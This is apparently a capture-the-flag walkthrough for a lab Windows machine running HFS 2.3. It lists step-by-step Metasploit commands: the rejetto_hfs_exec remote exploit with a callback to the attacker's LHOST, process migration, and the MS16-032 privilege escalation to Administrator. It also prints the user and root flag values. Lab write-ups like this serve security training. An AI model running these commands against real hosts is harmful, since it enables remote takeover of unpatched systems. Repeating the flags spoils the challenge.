As usual, let's start with nmap
nmap -sV -sC -p- 10.129.170.240

We can see it is using HFS 2.3. Let's google "HFS 2.3 exploit" and see if we find an exploit available.
We find an exploit on metasploit: https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec/
Let's follow these steps in the article.
msfconsole
use exploit/windows/http/rejetto_hfs_exec

show options

set RHOSTS 10.129.170.240
set LHOST 10.10.14.21

exploit

getuid

sysinfo

shell

dir

We find a text file called user.txt.txt
Let's open using:
type user.txt.txt

d0c39409d7b994a9a1389ebf38ef5f73
Congratulations! You got the user flag!
Let's now look for the root flag
cd ..
cd ..
dir

cd Administrator

Access is denied
Return to the meterpreter shell by typing:
exit

Privilege Escalation
Let's use Lester (local exploit suggestor) from Metasploit. This will scan the target for vulnervabilities.
To run Lester, we use:
run post/multi/recon/local_exploit_suggester

There are a couple of exploits we could use but I tried exploit/windows/local/bypassuac_eventvwr and it didn't work.
We will use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
But first let's look at the processes running using
ps

Let's migrate to explorer.exe with PID 1988
migrate 1988

background

This is giving us the session id which is 1 (we will need that later)
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

show options

set SESSION 1
set LHOST 10.10.14.21

exploit

shell

cd C:\Users\Administrator\Desktop
dir
type root.txt

51ed1b36553c8461f4552c2e92b3eeed
Congratulations! You got the root flag!
Comments